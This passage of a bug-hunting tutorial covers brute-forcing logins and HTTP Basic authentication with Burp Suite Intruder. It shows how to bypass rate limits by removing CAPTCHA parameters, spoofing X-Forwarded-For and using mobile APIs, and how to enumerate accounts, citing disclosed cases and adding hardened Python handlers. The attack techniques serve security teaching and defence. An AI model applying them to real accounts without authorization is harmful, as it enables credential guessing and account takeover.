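The limit that the beta portals in the Facebook case were missing, as an added example that is not from the book: a server-side OTP check that invalidates the code and locks verification after a few wrong guesses. The simulation mimics the "Numbers" payload type (000000 to 999999 in order) with and without the limit. The OtpStore class, the limits and the fixed sample code are assumptions made for illustration.

```python
"""Added example: OTP verification with a per-code failure limit. A 6-digit code
falls to sequential guessing when attempts are unlimited; with the limit, the
same guessing is stopped after MAX_FAILURES wrong answers."""
import hmac
import secrets
import time

MAX_FAILURES = 5        # wrong guesses allowed per issued code
LOCK_SECONDS = 15 * 60  # how long verification stays locked afterwards
CODE_TTL = 300          # seconds a code remains valid


class OtpStore:
    def __init__(self, max_failures=MAX_FAILURES, enforce_limit=True):
        self.max_failures = max_failures
        self.enforce_limit = enforce_limit       # False reproduces the weak portal
        self._codes = {}         # account -> (code, expires_at)
        self._failures = {}      # account -> wrong guesses for the current code
        self._locked_until = {}  # account -> time until which verify() refuses

    def issue(self, account, now=None, code=None):
        """Create a fresh 6-digit code for the account. A caller-supplied code is
        accepted only so that the simulation below is deterministic."""
        now = time.time() if now is None else now
        code = f"{secrets.randbelow(10**6):06d}" if code is None else code
        self._codes[account] = (code, now + CODE_TTL)
        self._failures[account] = 0
        return code  # in a real system this goes to the user's phone, never the client

    def verify(self, account, guess, now=None):
        """Return 'ok', 'wrong', 'expired' or 'locked'."""
        now = time.time() if now is None else now
        if self.enforce_limit and self._locked_until.get(account, 0) > now:
            return "locked"
        entry = self._codes.get(account)
        if entry is None or entry[1] < now:
            return "expired"
        code, _ = entry
        if hmac.compare_digest(code.encode(), guess.encode()):
            del self._codes[account]             # one-time: a used code is consumed
            return "ok"
        self._failures[account] += 1
        if self.enforce_limit and self._failures[account] >= self.max_failures:
            del self._codes[account]             # a new code must be requested
            self._locked_until[account] = now + LOCK_SECONDS
            return "locked"
        return "wrong"


def simulate_sequential_guessing(enforce_limit, code=None, account="victim"):
    """Try every 6-digit value in order. Returns (outcome, attempts_made)."""
    store = OtpStore(enforce_limit=enforce_limit)
    store.issue(account, now=0, code=code)
    for n in range(10**6):
        result = store.verify(account, f"{n:06d}", now=1)
        if result == "ok":
            return "compromised", n + 1
        if result == "locked":
            return "locked", n + 1
    return "not found", 10**6
```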


10.4.4. Basic Brute Force Attack Part IV - Two or More Payloads

In the previous sections, brute force was carried out on one parameter value. In other words, the situation assumed that the tester already knows the username of the person who is the object of the test, or that the tester is directly trying to "guess" a given OTP value (a number).

However, one question arises: is it possible to carry out this attack on two or more parameters in one request? The answer is yes. When a tester knows neither the username nor the password of the intended target, both can be brute-forced.

The execution is quite simple. As was done before, intercept a login attempt request and "throw" the request to the Intruder. On this occasion, the portal http://testphp.vulnweb.com/login.php is used again.

Figure 96 Request for Login Activity

Because in this condition the tester does not yet know valid values for the parameters uname (username) and pass (password), both must be marked (highlighted) to be brute-forced with the dictionary later.

In this view, the tester is required to change the "Attack Type" to "Cluster Bomb", so that Burp Suite changes the brute-force mode from one that only applies to a single parameter ("Attack Type" "Sniper") to one that applies to many parameters ("Attack Type" "Cluster Bomb").

Afterwards, go to the Payloads menu as usual to enter the dictionary to be used. In this situation, the tester will see a small change in the "Payload Set" under "Payload Sets".

Figure 97 Total of Payload Set

Long story short, because there are two parameters whose values are to be "looked for" by brute force, the Payload Sets in Burp Suite "give" a place for testers to enter a dictionary for each payload, meaning one payload set represents one parameter (applicable when the "Attack Type" "Cluster Bomb" is enabled).

To continue the test, the steps the tester needs to take are to load the list of usernames into "Payload set" 1 (one) and the list of passwords into "Payload set" 2 (two).

Figure 98 "Payload Set" 1 - Setup the List of Username


And here is an example of the list of passwords to be sent:

Figure 99 "Payload Set" 2 - Setup the List of Passwords

In "Payload count" and "Request count", the tester will see different values. This is because the number of usernames entered is three (3), and each will be tried with 4 (four) passwords. Therefore, the "Request count" value is 12 (twelve).

Once everything is prepared, run the execution as usual with "Start Attack".

Figure 100 Sample of Request with Two Payloads Set


In the picture, it can be seen that Burp Suite sends the requests alternately, from one username to the next.

And here is the end result of executing the twelve (12) requests in the "Request count" (i.e. with three usernames and four different passwords).

Figure 101 Sample of Request

Thus, it is easier for the tester to carry out brute force when the username, the password, or both are not yet known.

10.4.5. Basic Brute Force Attack V - Encode the Payload - HTTP Basic Authentication

In reality, the HTTP authentication process has several schemes that have become standards, such as "Basic", "Bearer", "Digest", and others as described on the Mozilla Developer portal. The way credentials are sent differs quite a lot between these schemes. Take HTTP "Basic" authentication as an example.

While the format familiar to most users is for the credential parameters (username and password) to be inserted either in the URL or in the POST data, for HTTP Basic Authentication these credentials (the username and password) are inserted in the header of the request, converted to base64 format.

Since the credentials are not submitted in the usual form (plaintext as usual), there will of course be a slight change of pace when wanting to brute-force a target that uses the HTTP Basic authentication scheme.

A simple example: a user has a username and password that are both "admin". In HTTP "Basic" authentication, the credentials are sent in the following format:

GET /login HTTP/1.1
Host: target.com
Authorization: Basic YWRtaW46YWRtaW4=

In detail, the value YWRtaW46YWRtaW4= represents the value "admin:admin" (without quotes; the first admin as the username and the second as the password) converted to base64 format.

Seeing this, it would be a problem if all of the username and password data in the tester's dictionary had to be converted manually to base64 for targets that use the HTTP "Basic" scheme. To deal with this, the tester can use the payload type "Custom Iterator" in the "Payload Sets" menu of Burp Suite.

To start, "throw" the request to be brute-forced to Intruder mode (in this case an HTTP request using "Basic" authentication). Then highlight (mark) the base64 value in the header of that request.

Figure 102 Highlight the Base64 Parameters


Afterwards, go to the "Payloads" tab and change the "Payload Type" in the "Payload Sets" to "Custom Iterator".

Figure 103 Setup the Payload Type to Custom Iterator

Then, enter the usernames as the values of the first position ("position 1") and add a colon ":" as the delimiter (separator), as shown in the following figure:

Figure 104 Add the Password and Separator

Afterwards, continue by moving to "position 2" to enter the list of passwords to be used.

When completed, the display will be as follows:


Figure 105 List of Passwords

For "position 2", do not add another colon, because the data format is username:password, which requires only one colon as separator.

When it was finished entirely implemented, then setting to enter the username and

password separated by a colon, has been successfully carried out. However, given that the "content"

received must be base64, then there is one more step that must be done testers,

namely by adding a "rule" in the Burp Suite so that the process will be conducted in accordance attack

the rule in question.

On this occasion, the examiner should lead to the feature "Payload Processing".

Picture 106 "Payload Processing" Feature


The step to take in this feature is to add a rule of type "Encode" with the option "Base64-encode", as shown below:

Figure 107 Add Payload Processing Rule - Encode to Base64

Figure 108 Encode to Base-64


And because base64 output generally ends with the "equals" character, the next thing to do is to "drop" the "=" sign from the character list in the "Payload Encoding" feature. Burp URL-encodes "=" to "%3D" by default, and since the Authorization header is not URL-decoded by the server, an encoded padding character would make the base64 value undecodable.

Figure 109 Normal - With "="

Figure 110 Remove the "="

If you do not want any character to be "dropped", simply uncheck "URL-encode these characters".

Once everything has been set, the next step for the tester is to choose "Start attack" to execute the attack.

In the results, it can be seen that every parameter entered is converted directly to base64 format.

Figure 111 Parameter was Encoded to Base64

To be sure, the tester can decode the values one by one with the "Decoder" in Burp Suite.


Figure 112 Decode Result - Burp Suite
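The following is an added example, not code from Bug Hunting 101 or from Burp Suite: a reference implementation of the RFC 7617 credential format that the Custom Iterator plus Base64 rule produces, with a decoder of the kind a server applies. It is useful for checking Intruder's output (the "Decoder" step above) and it shows the padding caveat: a token whose "=" was URL-encoded to "%3D" is rejected outright. The function names are this example's own.

```python
"""Added example (not from Bug Hunting 101 or from Burp Suite): the credential
transformation behind HTTP "Basic" authentication (RFC 7617), as a reference
for checking what Intruder produced and what a strict server decodes.
"""
import base64
import binascii
from typing import Optional, Tuple


def build_basic_header(username: str, password: str) -> str:
    """Return the Authorization header value for the given credentials.

    RFC 7617 joins user-id and password with a single colon and base64-encodes
    the result; the user-id itself must not contain ":" or the server cannot
    split the pair unambiguously (the password may contain colons).
    """
    if ":" in username:
        raise ValueError("user-id must not contain ':'")
    raw = f"{username}:{password}".encode("utf-8")
    return "Basic " + base64.b64encode(raw).decode("ascii")


def parse_basic_header(header_value: str) -> Optional[Tuple[str, str]]:
    """Decode an Authorization header back to (username, password).

    Returns None for anything a strict server rejects. That includes a token
    whose "=" padding was URL-encoded to "%3D" (Intruder's default payload
    encoding does that): "%" is not a base64 character, so decoding fails.
    """
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    if ":" not in raw:
        return None
    user, _, pwd = raw.partition(":")
    return user, pwd


def roundtrip_ok(username: str, password: str) -> bool:
    """Self-check: encoding then decoding must give the original pair back."""
    return parse_basic_header(build_basic_header(username, password)) == (username, password)


if __name__ == "__main__":
    header = build_basic_header("admin", "admin")
    print(header)                                            # Basic YWRtaW46YWRtaW4=
    print(parse_basic_header(header))                        # ('admin', 'admin')
    print(parse_basic_header("Basic YWRtaW46YWRtaW4%3D"))    # None
```

Run the decoder over a handful of the generated Intruder payloads: if it returns None for all of them, the "=" is still being URL-encoded and the attack results are meaningless, which is precisely why the payload-encoding list has to be adjusted first.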

10.5. Bypassing Brute Force Protection (Kinds of Brute Force Bypass)

10.5.1. Bypass Method Part I - Bypassing CAPTCHA Protection

Without doubt, one of the brute-force countermeasures most commonly known to developers is adding a CAPTCHA. The way CAPTCHAs are used varies widely: some are custom built, some use third-party plugins, and the most common is to use Google's CAPTCHA. Regardless of the pros and cons of each, a portal that uses a CAPTCHA certainly cannot be said to be "free" from brute-force attacks.

10.5.1.1. Definition of CAPTCHA

CAPTCHA stands for "Completely Automated Public Turing test to tell Computers and Humans Apart". Simply put, the feature is used to distinguish an activity carried out by a human from one carried out by a computer. (This will remind testers of the Turing test, which has a similar aim; the fundamental difference is that this test is administered by a computer, which is why it is often called a Reverse Turing Test.)

In practice, the feature requires one simple step from the user, such as typing the letters that appear in an image or choosing the images that match the instructions given.


10.5.1.2. Common Request with CAPTCHA

When a user wants to log in to an application that has been protected with a CAPTCHA, it is a "must" for that user to make sure that the "characters" / "options" "wanted" by the CAPTCHA are "conveyed" correctly.

As an example, Google's CAPTCHA requires the user to choose the images that correspond to the "request".

Figure 113 Sample CAPTCHA by Google

In the situation shown in the image, the user is required to select every image that contains a bicycle. Once this is done correctly, the user is "allowed" to continue the activity, such as login, registration, or any other action that has been paired with the CAPTCHA feature.

As for the process itself, when a user performs an "action" paired with Google's CAPTCHA, the application automatically sends a request consisting of the main parameters of the action (such as username and password) accompanied by the CAPTCHA parameter named "g-recaptcha-response".


Here is an example login from an application that has implemented Google's CAPTCHA with the intention of resisting brute-force attacks.

Figure 114 Sample Request with g-recaptcha-response

It should be noted that the value of the g-recaptcha-response parameter is provided automatically by Google once the user has "chosen" in accordance with the request shown (for example, selecting the bicycle images).

When the value of g-recaptcha-response does not match what is "expected", the CAPTCHA value is automatically considered invalid and the user will be asked to "deal" with the CAPTCHA again until a valid value is produced.

10.5.1.3. Execution Example: Bypassing CAPTCHA - Veris Case

Is it possible for a tester to bypass Google's CAPTCHA? In reality it is certainly not easy, given that the tester would have to break the CAPTCHA algorithm used by Google. However, there is a trick that makes it possible under certain conditions, as in the Veris case encountered by a researcher with the nick bugs3ra.

From this case, it can be seen that although an action in the application is paired with a CAPTCHA, in reality the link between the action and its CAPTCHA is not always properly enforced. In other words, the parameter sent by the CAPTCHA is not treated as mandatory by the system, so it can be bypassed, allowing a tester to perform a brute-force attack freely.

So what needs to be done? Simply put, the tester only needs to intercept the request when logging in with the CAPTCHA filled in correctly, then remove the g-recaptcha-response parameter (or whatever similar parameter the application uses). Afterwards, send the request in question (without the CAPTCHA parameter). If the action in the application has not been properly tied to the CAPTCHA through the parameter shown, the CAPTCHA is automatically bypassed and the tester can launch a brute-force attack freely.

Here is an example of the request with the CAPTCHA parameter:

Figure 115 Request with g-recaptcha-response

And the following is an example of the request without the CAPTCHA parameter:

Figure 116 Request without g-recaptcha-response

For the record, when removing the parameter, the tester should remove it starting from the "&" character followed by the parameter name. Example: &g-recaptcha-response.


And the following is an example of the bypass being executed in the Veris case:

Figure 117 Removing the g-recaptcha-response - https://hackerone.com/reports/124173
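The following is an added example, not code from Bug Hunting 101 or from Veris, showing the server-side defect behind this kind of bypass: a login handler that verifies the CAPTCHA token only when the client sends it, beside one that treats the token as a required field. The CAPTCHA verifier is injected as a stand-in (a real one would call the provider's verification API with the g-recaptcha-response value); the user record, the token value and the function names are constructed for this example.

```python
"""Added example (not from Bug Hunting 101 or from Veris): a login handler in
which the CAPTCHA token is merely "checked when present", beside one in which
it is mandatory. The verifier is injected so the example runs offline; a real
one would call the CAPTCHA provider's verification API with the token.
"""
from typing import Callable, Dict

Verifier = Callable[[str], bool]

# Constructed sample data for this example only.
USERS = {"alice": "correct horse battery staple"}


def fake_verifier(token: str) -> bool:
    """Stand-in for the provider call: only one constructed token is accepted."""
    return token == "valid-token"


def credentials_ok(username: str, password: str) -> bool:
    return USERS.get(username) == password


def login_vulnerable(form: Dict[str, str], verify: Verifier) -> str:
    """Verifies g-recaptcha-response only if the client sent it.

    Deleting '&g-recaptcha-response=...' from the request body therefore
    skips the check, and every guess reaches the credential comparison.
    """
    token = form.get("g-recaptcha-response")
    if token is not None and not verify(token):
        return "captcha failed"
    if credentials_ok(form.get("username", ""), form.get("password", "")):
        return "ok"
    return "invalid credentials"


def login_hardened(form: Dict[str, str], verify: Verifier) -> str:
    """Treats the token as a required field.

    Missing, empty and rejected tokens all stop processing before the
    credentials are looked at, so the CAPTCHA really gates the login.
    """
    token = form.get("g-recaptcha-response", "")
    if not token or not verify(token):
        return "captcha failed"
    if credentials_ok(form.get("username", ""), form.get("password", "")):
        return "ok"
    return "invalid credentials"


def compare(form: Dict[str, str]) -> Dict[str, str]:
    """Run the same submitted form through both handlers."""
    return {
        "vulnerable": login_vulnerable(form, fake_verifier),
        "hardened": login_hardened(form, fake_verifier),
    }


if __name__ == "__main__":
    stripped = {"username": "alice", "password": "guess1"}   # token removed
    print(compare(stripped))
    # {'vulnerable': 'invalid credentials', 'hardened': 'captcha failed'}
```

The vulnerable handler answers "invalid credentials" to every stripped request, which is the unthrottled oracle that Intruder then drives. Two further points for a real implementation: the verifier must check the provider's "success" field rather than merely that a call was made, and a captured token must not be replayable (Google's verification API rejects a token that has already been verified once).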

10.5.1.3.1. Burp Suite - Repeater Mode

There are times when trial-and-error deletion of parts of a request is rather awkward to do while staying on Burp Suite's "Intercept" tab, because in practice the tester will have to refresh / re-send the request through the browser and then go back to Burp Suite's "Intercept" tab, over and over again.

To avoid this, the tester can keep experimenting (without the hassle of going back and forth between the browser and Burp Suite) by using Burp Suite's "Repeater" mode.

The process itself is not much different from what was described for "sending" a request to "Intruder" mode. The difference is that this time the tester sends it to "Repeater".

Figure 118 Send the request to Repeater


After selecting "Send to Repeater", the request in question automatically appears on the "Repeater" tab.

Figure 119 Interface of Repeater Mode

As seen in this view, the tester is free to send the request and see the response on a single screen. This makes it easy for the tester to modify / delete parameters or parameter contents and send the request directly to the server.

The request is sent by selecting the "Go" button at the top left. And one of the best things is that the tester can have multiple tabs, each representing a specific request to be analysed, as shown in the following figure:

Figure 120 Many Tabs to be Analyzed


10.5.2. Bypass Method Part II - Adding a Custom Header - Dashlane Case

Besides using a CAPTCHA, another method applications use to prevent brute-force attacks is to limit the number of failed logins to a certain value (for example six attempts, in line with the PCI DSS requirement).

One example is what Dashlane had applied on one of its portals, located at ws1.dashlane.com. At that time, Dashlane would block when the number of requests (brute force) reached the specified value.

However, a researcher with the nick corb3nik successfully bypassed this protection by adding a custom header (X-Forwarded-For) to the existing request.

Quoting Mozilla's developer portal, X-Forwarded-For is used to identify the original IP address of a client that communicates with the server via an HTTP proxy or load balancer. Generally, when we look at traffic from the client to the server, only the IP of the proxy or load balancer is recorded in the log; by adding the "X-Forwarded-For" header, the user's real IP becomes known.

By making use of "X-Forwarded-For", corb3nik finally managed to bypass the brute-force protection applied by Dashlane. The step taken was to add the header in question to the request sent from the application to the server. This works whenever the limiter keys its counter on the address taken from that header: every new header value then looks like a new client.

Here is the initial situation, when corb3nik's login attempts were blocked:

Figure 121 Attempt was Blocked by Dashlane

And the following shows the addition of the "X-Forwarded-For" header to the request, sent with the purpose of bypassing the brute-force protection that had been applied.


Figure 122 Bypassing Brute Force Protection at Dashlane - https://hackerone.com/reports/225897

This vulnerability was considered valid by Dashlane and was fixed in less than 7 (seven) days.
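The following is an added example, not code from Bug Hunting 101 or from Dashlane: a failed-login limiter keyed on the client address, with the address derived first by trusting X-Forwarded-For from anyone and then only when the TCP peer is one of the application's own proxies. The six-attempt limit is the figure quoted above; the addresses, the proxy range and all function names are constructed for this example.

```python
"""Added example (not from Bug Hunting 101 or from Dashlane): a failed-login
limiter keyed on the client address, with the address derived first by
trusting X-Forwarded-For from anyone and then only from known proxies.
All addresses and proxy ranges below are constructed for this example.
"""
import ipaddress
from collections import defaultdict
from typing import Callable, Dict, Iterable, Optional

MAX_FAILURES = 6  # the per-source limit quoted in the text (PCI DSS)


def client_ip_naive(remote_addr: str, xff: Optional[str]) -> str:
    """Takes the first X-Forwarded-For hop, whoever sent it.

    Any direct client can put an arbitrary value in the header, so each
    request can pretend to come from a fresh address.
    """
    if xff:
        return xff.split(",")[0].strip()
    return remote_addr


def client_ip_hardened(remote_addr: str, xff: Optional[str],
                       trusted_proxies: Iterable[str]) -> str:
    """Honours X-Forwarded-For only when the TCP peer is one of our proxies.

    The chain is walked from the right: hops appended by trusted proxies are
    skipped and the first untrusted one is the client. Values prepended by
    the client itself sit further left and are never reached.
    """
    nets = [ipaddress.ip_network(p) for p in trusted_proxies]

    def is_trusted(addr: str) -> bool:
        try:
            return any(ipaddress.ip_address(addr) in n for n in nets)
        except ValueError:
            return False

    if not xff or not is_trusted(remote_addr):
        return remote_addr          # direct client: the header is not ours to trust
    for hop in reversed([h.strip() for h in xff.split(",")]):
        if is_trusted(hop):
            continue
        try:
            ipaddress.ip_address(hop)
        except ValueError:
            break                   # malformed hop: fall back to the peer
        return hop
    return remote_addr


class FailureLimiter:
    """Counts consecutive failed logins per resolved client address."""

    def __init__(self, resolve: Callable[[str, Optional[str]], str]) -> None:
        self.resolve = resolve
        self.failures: Dict[str, int] = defaultdict(int)

    def attempt(self, remote_addr: str, xff: Optional[str], password_ok: bool) -> str:
        key = self.resolve(remote_addr, xff)
        if self.failures[key] >= MAX_FAILURES:
            return "blocked"
        if password_ok:
            self.failures[key] = 0
            return "ok"
        self.failures[key] += 1
        return "failed"


def spoof_run(limiter: FailureLimiter, attempts: int) -> int:
    """Simulate one direct client (203.0.113.7) sending a different
    X-Forwarded-For on every failed attempt; returns how many got through."""
    allowed = 0
    for i in range(attempts):
        if limiter.attempt("203.0.113.7", f"198.51.100.{i + 1}", False) == "failed":
            allowed += 1
    return allowed


if __name__ == "__main__":
    proxies = ["10.0.0.0/8"]
    print(spoof_run(FailureLimiter(client_ip_naive), 20))   # 20
    hardened = FailureLimiter(lambda peer, xff: client_ip_hardened(peer, xff, proxies))
    print(spoof_run(hardened, 20))                           # 6
```

Keying on the source address alone is still weak (an attacker with many addresses, as in the Weblate case mentioned later in this chapter, is not stopped by it), so the per-address counter should be paired with a per-account counter and ideally with a back-off on the account itself.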

10.5.3. Bypass Method Part III - Check the Mobile Request - Instacart Case

In certain situations, there may be a difference depending on whether a request is made through the web browser or through the mobile application.

In this situation, a researcher with the nick cablej proved it was possible to bypass the brute-force protection at Instacart by making use of the requests from its mobile application.

The steps taken are not much different, namely:

• Intercept a request from the mobile application (it was then found that the POST request went to https://www.instacart.com/oauth/token);

• Then send it to Intruder mode;

• Afterwards, cablej performed a brute force through the request in question and found that the endpoint used by Instacart's mobile application had not yet implemented any prevention against brute-force attacks.

From here it can be concluded that the endpoints used when accessing an application via a (desktop) web browser and via a mobile application can have different requests. Therefore, examining each access path is a necessity of its own in order to identify the potential risks present in an application.

Note: remember that this guide does not discuss intercepting data traffic from mobile applications, so the intercept steps involved will not be detailed here.


10.5.4. Bypass Method Part IV - Check the API - Asus Case

This case is actually not much different from the Instacart case. The difference is that the brute-force bypass on the Asus portal was done by tracing the API information (endpoint, key, etc.) used by Asus and then sending requests directly to the endpoint in question.

Asus basically already had brute-force protection on its login portal, which can be seen from the CAPTCHA implemented on the page in question.

Figure 123 CAPTCHA at Asus Portal

However, this CAPTCHA could ultimately be bypassed by making use of the API used by some of Asus's other (Android-based) applications (such as Baby Vivo and HiVivo).

At that time, it was found that these two Android-based mobile applications were not yet obfuscated, allowing a tester to study the existing flow. Long story short, from decompiling the mobile applications in question, information such as the API used (from the key to its endpoint) was obtained.


Figure 124 API-ID at Asus VivoBaby Mobile Application

Figure 125 API endpoints at Asus VivoBaby Mobile Application

Thereafter, the tester immediately visited the endpoint obtained from the decompiled code (located at https://account.asus.com/ws/awscusinfo.asmx), followed by entering the data obtained previously.

Figure 126 Endpoint to Login - Belong to Asus


Once all of the required parameters were filled in, the request in question was intercepted using Burp Suite for further analysis.

Figure 127 Trying to login from Asus API

From this analysis, it was found that the endpoint could indeed "bypass" the CAPTCHA protection that Asus had implemented on its login portal.

To be sure, brute force was carried out through Burp Suite's "Intruder" mode, and it was finally proven that the attack could be launched successfully.

The following is the application's response when the password entered was incorrect:

Figure 128 Failed to login - Response Length 752 - Failed

And here is the application's response when the password entered was correct:


Figure 129 Success to Log - 1106 Response Length - Valid

Note: remember that this guide does not discuss decompiling mobile applications, so the steps involved will not be detailed here.

10.6. Brute Force Attack References

In reality, brute-force attacks and the methods for bypassing their protections are not limited to the concepts presented in this guide. One example is bypassing brute-force protection by changing the IP address (as demonstrated by the researcher named atruba on the Weblate platform).

Nevertheless, the concepts described are expected to cover the basics needed to execute, or bypass, the existing kinds of attack.

As a complement to the explanation above, here are some references that can be consulted on brute-force-related topics:

• Definition of Brute Force Attack: https://www.kaspersky.com/resource-center/definitions/brute-force-attack

• What is a Brute Force Attack: https://www.varonis.com/blog/brute-force-attack/

• Bypassing Google's Fix to Access Their Internal Admin Panels: https://medium.com/bugbountywriteup/bypassing-googles-fix-to-access-their-internal-admin-panels-12acd3d821e3

• Vulnerable Demonstration Site by Acunetix: http://testphp.vulnweb.com/login.php

• Damn Vulnerable Web Application: http://www.dvwa.co.uk/


• Hacking Any Facebook Account by Bypassing the OTP via Brute Force Attack: http://www.anandpraka.sh/2016/03/how-i-could-have-hacked-your-facebook.html

• [Video] Hacking Any Facebook Account by Bypassing the OTP via Brute Force Attack: https://www.youtube.com/watch?v=U3Of-jF1nWo

• The 'Basic' HTTP Authentication Scheme: https://tools.ietf.org/html/rfc7617

• The general HTTP authentication framework: https://developer.mozilla.org/en-US/docs/Web/HTTP/Authentication

• HTTP Authentication: https://www.httpwatch.com/httpgallery/authentication/

• A set of HTTP/1.1 features: https://jigsaw.w3.org/HTTP/

• Payload Processing (Rules and Encoding) at Burp Suite: https://portswigger.net/burp/documentation/desktop/tools/intruder/payloads/processing#payload-processing-rules

• HTTP Basic Authentication Dictionary and Brute-force Attacks with Burp Suite: http://www.dailysecurity.net/2013/03/22/http-basic-authentication-dictionary-and-brute-force-attacks-with-burp-suite/

• Use Burp Suite to Brute-force HTTP Basic Authentication: https://securityonline.info/use-burp-suite-brute-force-http-basic-authentication/

• Veris - Bypassing CAPTCHA by Removing the CAPTCHA Parameter: https://hackerone.com/reports/124173

• Instacart - Bypassing Brute Force Attack Prevention by Using the Mobile Request: https://hackerone.com/reports/160109

• Dashlane - Login Attempt Bypass (Bypass Throttling) by Adding the X-Forwarded-For Header: https://hackerone.com/reports/225897

• X-Forwarded-For header: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For

• Asus - Bypassing CAPTCHA by Using the Mobile API: http://firstsight.me/2017/12/lack-of-binary-protection-at-asus-vivo-baby-and-hivivo-for-android-that-could-result-of-several-security-issues/

• Weblate - Bypassing Brute Force Protection by Changing the IP Address: https://hackerone.com/reports/224460


11. CHECK FOR ACCOUNT (LOGIN) ENUMERATION

For most application owners, the account (login) is something that must be protected so that it cannot be enumerated by unauthorized parties. One reason is quite simple: they want to "complicate" a tester's attempts to gain access to a targeted account.

This is in line with the discussion of "why the account and password" in the "Brute Force" chapter: the account is one of the important factors that "permits" a tester to break into the system.

On that basis, this guide also presents a few steps that can be taken to enumerate accounts (logins) in an application.

11.1. Common Login Identities at Applications

The way login is handled in an application comes in several types, which depend on the function of the application itself. Several examples of applications in circulation are:

• Applications of a personal nature (or, one might say, applications without interaction), such as a company profile or a personal blog. In this condition, the login account can usually be either a username (unique user name) or an email address. An often-used example of this is the WordPress CMS, which already has its own settings so that the username cannot be seen from the public area.

• The second type is applications of a social-network nature (allowing users to interact), such as forums or social media like Yammer, Facebook, and others. In this condition, the user can usually log in with a username only, an email, or perhaps both.

• The third type is closed applications such as corporate banking. In this condition, the user generally has to come to the owner first and submit a number of documents before being able to log in. The login is commonly a username (unique name of the user).

With such a basic overview, it can of course be concluded that the attack patterns that can be executed will vary. For example, when an application openly displays usernames and allows users to log in with that username, the discussion will of course turn to ways of obtaining the email addresses of existing users, or to possible ways of brute forcing that username.

Conversely, if an application does not "allow" users to find out another user's unique name (username), then account enumeration becomes something that can be carried out. Nevertheless, it must be remembered that how serious this issue is depends very much on each owner's policy or the regulations governing the application.

11.2. Basic Account Enumeration

11.2.1. Account Enumeration via Login Form - Veris Case

One of the basic things a tester can do is to try entering an email address (either their own registered email or another one that is known or suspected to exist in the application) in the login form, followed by an arbitrary password.

The goal is quite simple, namely to see the message the application displays when the attempt fails. Here is one example of execution:

Figure 130 Input the Email at Login Form

When an application is vulnerable to this "account enumeration", it will provide a "response" that reveals whether or not the username entered is valid.

For example, when victim@victim.com is a valid value (but the password is wrong), the vulnerable application states that the password entered is wrong. Conversely, if victim@victim.com is not valid, the vulnerable application states that the username is not found or is invalid.


Here is an example of the result of logging in with an account that is not registered in the application:

Figure 131 Invalid Username - Failed Response

With such information provided, the tester can automate the enumeration by sending the request to Burp Suite's Intruder mode together with a list of emails suspected to exist in the application.

Additional reference: an issue like this was found by a researcher with the nick zuh4n in Veris's application. At that time, Veris "provided" the information "User is not Exist" when a wrong username was given, and "Password does not Match" when the password entered was incorrect.

11.2.2. Account Enumeration via Forgot Password Feature - Infogram Case

There are times when a login form is protected so well that it does not allow a tester to enumerate the registered accounts. However, there is a commonly used way to get around this protection, namely enumerating through the "forgot password" feature.

One example of this is what was done by a researcher with the nick 10098 saikiran, who successfully enumerated registered accounts via the forgot password feature. At that time, Infogram did not protect that feature, making it easy for a tester to obtain user accounts by brute force.


Just as in the previous point, to automate the enumeration (after a vulnerable endpoint has been found, such as the forgot password feature in this case), the tester can send the request in question to Intruder mode and enter the list of emails suspected to be registered in the application.

11.2.3. Account Enumeration via Resend Confirmation Feature - Xoom Case

Another step a tester can use to enumerate accounts is to make use of the "resend confirmation" feature. This feature is basically used to send the activation link again to the registered email address so that the user can activate the account. However, an improper implementation will certainly turn this feature into an issue.

One example is the issue found in the Xoom application (a PayPal company). By default, Xoom had protected the application so that users could not enumerate through either the login form or the sign-up process. However, it turned out that its "resend confirmation" feature was still somewhat vulnerable, allowing a tester to enumerate the email addresses registered in it.

In execution, a registered email that has already been activated in Xoom cannot obtain the activation link again; the error information displayed by the application states that "the account has been activated". Reflecting on this situation, the tester can of course make use of that information to obtain the active accounts that exist in the Xoom application.

In the implementation, the tester only needs to use the "resend email" feature available in the application.

Figure 132 Resend Email Feature


The steps taken are quite simple: the tester needs to obtain the HTTP request of the "Resend mail" feature in question, to be used later for enumerating the emails that may exist in the application.

Here is an example HTTP request from the feature:

POST /bex-v1/users/resend-signup-mail HTTP/1.1
Host: www.xoom.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/plain, */*; q=0.01
Accept-Language: en
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://www.xoom.com/request/signup-confirmation
Content-Length: 32
Cookie: <some_of_cookies_overhere>
Connection: close

email=Circle.idts2%40hotmail.com

As can be seen, by sending this request to Burp Suite's Intruder, highlighting the email parameter and "equipping" it with the email list, the enumeration process will be executed automatically.

Afterwards, the tester only needs to look at the response length produced by the application.

Figure 133 Account Enumeration Process via "Resend Confirmation Email"

In this condition, when the response length is 571, the account is declared non-existent; when it is 406, the account exists and has already been activated.


Figure 134 Account not Found - Invalid Email
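The following is an added example, not code from Bug Hunting 101 or from Veris, Infogram or Xoom, and it serves the three cases above at once: a login handler with the two distinct failure messages of the Veris case and a resend-confirmation handler whose three states produce three different body lengths (the 571 / 406 oracle of the Xoom case), each beside a version that answers identically whether or not the address is registered. The hardened login also hashes the password for unknown accounts so that timing does not leak what the message no longer does. The user store, the salt, the passwords and the function names are constructed for this example; a forgot-password endpoint would be hardened in exactly the same way as the resend handler.

```python
"""Added example (not from Bug Hunting 101, Veris, Infogram or Xoom): the
login and resend-confirmation handlers in their enumerable form beside
versions that answer identically whether or not the address is registered.
The user store, salt and passwords are constructed for this example.
"""
import hashlib
import hmac
from typing import Callable, Dict, List

_SALT = b"constructed-salt"   # one salt for brevity; use a per-user salt in practice


def _pw_hash(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), _SALT, 50_000)


USERS: Dict[str, dict] = {
    "victim@victim.com": {"hash": _pw_hash("s3cret"), "activated": True},
    "pending@victim.com": {"hash": _pw_hash("temp-pass"), "activated": False},
}
_DUMMY_HASH = _pw_hash("not-a-real-password")   # compared against when the account is unknown
SENT_MAIL: List[str] = []                        # stand-in for the outgoing mail queue


def login_vulnerable(email: str, password: str) -> str:
    """Distinct messages for 'no such user' and 'wrong password' (the Veris
    behaviour) tell the caller which addresses exist."""
    user = USERS.get(email)
    if user is None:
        return "User is not Exist"
    if not hmac.compare_digest(_pw_hash(password), user["hash"]):
        return "Password does not Match"
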